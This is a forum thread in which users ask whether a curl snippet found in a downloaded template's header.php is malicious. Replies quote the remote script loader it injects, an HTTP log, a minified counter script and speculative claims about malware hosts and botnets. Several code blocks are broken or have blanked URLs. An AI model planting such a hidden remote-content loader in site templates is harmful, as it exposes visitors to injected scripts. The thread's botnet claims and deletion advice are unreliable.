Is this malicious code?

Ask about general coding issues or problems here.

Moderators: macek, egami, gesf

New php-forum User
New php-forum User
Posts: 1
Joined: Thu Nov 10, 2011 10:37 pm

Is this malicious code?

Postby jlauria22 » Thu Nov 10, 2011 10:40 pm

I have knowledge of html and css but not php. In a website template that I had downloaded it had the following codw in the header.php file. Can someone please explain to me if it is malicious, what it means or what it is commanding? The code is:

$url = "";
$ch = curl_init();
$timeout = 5;
$data = curl_exec($ch);
echo "$data";

New php-forum User
New php-forum User
Posts: 2
Joined: Mon Nov 21, 2011 10:29 am

Re: Is this malicious code?

Postby roke24768 » Mon Nov 21, 2011 10:31 am

I'd be interested to know too what this code does, and whether I could speed up my site by removing it. Much appreciated.

User avatar
php-forum GURU
php-forum GURU
Posts: 2196
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Postby egami » Mon Nov 21, 2011 12:24 pm

The code itself isn't really mallicious, it's what the code is downloading that might be.

User avatar
php-forum GURU
php-forum GURU
Posts: 2196
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Postby egami » Mon Nov 21, 2011 12:28 pm

OK, so.. it's quite easy.

This script downloads this script..

Code: Select all

<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src=""></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src=""></scr'+'ipt>'); } </script>

and the file is empty when downloading it straight up.. so it's probably an .htaccess problem because I'm not connecting directly to the website in someway.

I would be cautious of it, to be frank.

New php-forum User
New php-forum User
Posts: 2
Joined: Mon Nov 21, 2011 10:29 am

Re: Is this malicious code?

Postby roke24768 » Mon Nov 21, 2011 11:43 pm

Thanks for the help.

Two lines above in the downloaded script, there is a jquery.min.js. I tried to open it with notepad, but it wouldn't open.

There is also a file untitled3.html in the wordpress theme .js folder with the same extract of code as originally posted.

I tried to just remove the code from the header.php file, but the site stops working.

I appreciate the warning to be cautious of it. I had put a bit of work into customising it before I noticed what it was doing. Hope it hasn't done too much damage.

If anyone has any more insights that would be much appreciated.

New php-forum User
New php-forum User
Posts: 1
Joined: Thu Jan 19, 2012 1:47 pm

Re: Is this malicious code?

Postby orpapage » Thu Jan 19, 2012 1:56 pm

just faced the exact same problem.
the solution is quite simple..
just delete that php code! Yes that's right--> select code. ctrl+x. Update File.
Just did it myself and it works like a beauty! Website loads much much faster also.

oh! i almost forgot! if for any reason things don't go as planned--> go to the same place in the file. ctrl+v. Update File :D

New php-forum User
New php-forum User
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm

Re: Is this malicious code?

Postby TheProdigyGuy » Thu Jan 19, 2012 2:15 pm

IMHO it is suspicious and using this way (lets say if it is legal site but hacked and that .js files spoofed)
that guys can infect your site visitors+exploit some 0day vulnerabilities against Flash players+Java Plugins+redirect to malware domains+Phish+DDOS another sites using your Real Visitors UA+IP(because it has advantages!) and Finally create BOTNET from your site visitors.

Without referer:
<span style="display:none"><script id="_wau02f">var _wau = _wau || []; _wau.push(["small", "oyh4xtc1j9zo", "02f"]);(function() { var s=document.createElement("script"); s.async=true; s.src="";document.getElementsByTagName("head")[0].appendChild(s);})();</script>


cmd> GET /small.js HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host:
hdr> HTTP/1.1 200 OK
hdr> Date: Thu, 19 Jan 2012 22:26:34 GMT
hdr> Content-Type: application/x-javascript
hdr> Content-Length: 4212
hdr> Last-Modified: Wed, 18 Jan 2012 06:52:38 GMT
hdr> Connection: close
hdr> Server: Apache/1.1 (Windows 4.00.950)
hdr> Expires: Sat, 18 Feb 2012 22:26:34 GMT
hdr> Cache-Control: max-age=2592000
hdr> Accept-Ranges: bytes
RequestDone Error = 0
StatusCode = 200


+===> malware domain+For calculation count of users!
==> well known malware domain!

It also calculates how much "online users"

Code: Select all

var Tynt=Tynt||[];if(typeof _wau!=="undefined"){var WAU_ren=WAU_ren||[];clearTimeout(window.WAU_f_init);window.WAU_f_init=setTimeout(WAU_pl,300)}function WAU_small(b,d){if(typeof d==="undefined"){var d=-1}var a="";if(document.title){a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))}var c=document.getElementsByTagName("script")[0];(function(){var f=encodeURIComponent(document.referrer);var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src=""+b+"&t="+a+"&c=s&y="+f+"&a="+d+"&r="+Math.ceil(Math.random()*999999);c.parentNode.insertBefore(e,c)})();if(document.location.protocol=="http:"){Tynt.push("w!"+b);(function(){var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src="";c.parentNode.insertBefore(e,c)})()}}function WAU_r_s(c,key,async_index){if(typeof async_index==="undefined"){var async_index=-1}var raw_im_data="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";var meta=eval(raw_im_meta);if(WAU_legacy_b()){raw_im_data=""}c+="o";c=c.split("");var img=document.createElement("img");img.onload=function(){var wid=document.createElement("div");"relative";"inline-block";"url("+raw_im_data+")";"80px";"15px";"0";"0";"hidden";"pointer";wid.title="Click to see stats for this site by ("+key+")";var x_pos=20;if(c.length>6&&c[0]!="1"){x_pos=16}else{if(c.length>6&&c[0]=="1"){x_pos=17}}for(var i=0;i<c.length;i++){var char_meta=meta[c[i]];var character=document.createElement("div");"url("+raw_im_data+")";"no-repeat";"scroll";[0]+"px "+char_meta[1]+"px";"absolute";[2]+"px";[3]+"px";"4px";"px";[3]+"px";"hidden";"0";"0";wid.appendChild(character);x_pos+=char_meta[2]+1}wid.onclick=function(){window.location=""+key+"/"};if(async_index>=0){var scr=document.getElementById("_wau"+_wau[async_index][2]);scr.parentNode.insertBefore(wid,scr.nextSibling)}else{WAU_insert(wid,"")}};img.src=raw_im_data}function WAU_insert(c,d){var a=document.getElementsByTagName("script");for(var b=0;b<a.length;b++){if(a[b].src.indexOf(d)>0){a[b].parentNode.insertBefore(c,a[b].nextSibling)}}}function WAU_legacy_b(){if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8){return true}return false}function WAU_pl(){document.body?WAU_la():setTimeout(WAU_pl,500)}function WAU_la(){for(var a=0;a<_wau.length;a++){if(typeof WAU_ren[a]==="undefined"||WAU_ren[a]==false){WAU_ren[a]=true;if(typeof window["WAU_"+_wau[a][0]]==="function"){if(_wau[a][0]=="map"){window.WAU_map(_wau[a][1],_wau[a][3],_wau[a][4],_wau[a][5],_wau[a][6],a)}else{if(typeof _wau[a][3]!=="undefined"){window["WAU_"+_wau[a][0]](_wau[a][1],_wau[a][3],a)}else{window["WAU_"+_wau[a][0]](_wau[a][1],a)}}}}}};

The site is travelling around the World Downloading malware. The Journey starts in the USA, then moves to Europe (Germany/Austria) and it ends in China.

Google Tag:
List of Naruto: Shippuden episodes. Naruto is an anime series based on the manga series of the same.

The Cyber Criminals are using AS21844 network to dish out the
infection process. If one malware sites is taking out, a new one will take its place immediately.

The variants found start from Trojan Downloaders all the way up to Fake AV Infections.

The Journey starts at IP

Malware found on iP:
PHP/BackDoor.AR Hosted on Malicious Network:

AS11798 /Bluehost Inc.
Malware Found on AS11798
Trojan Zbot

The traffic goes to IP through
The sites are being hosted on the AS21844. This network is being flagged as

Network Info:

Network Name The Planet Internet Services
Primary ASN 21844
Website hxxp://
Then IP

It is really great thing:
grep -r '' * |less

Return to “PHP coding => General”

Who is online

Users browsing this forum: No registered users and 6 guests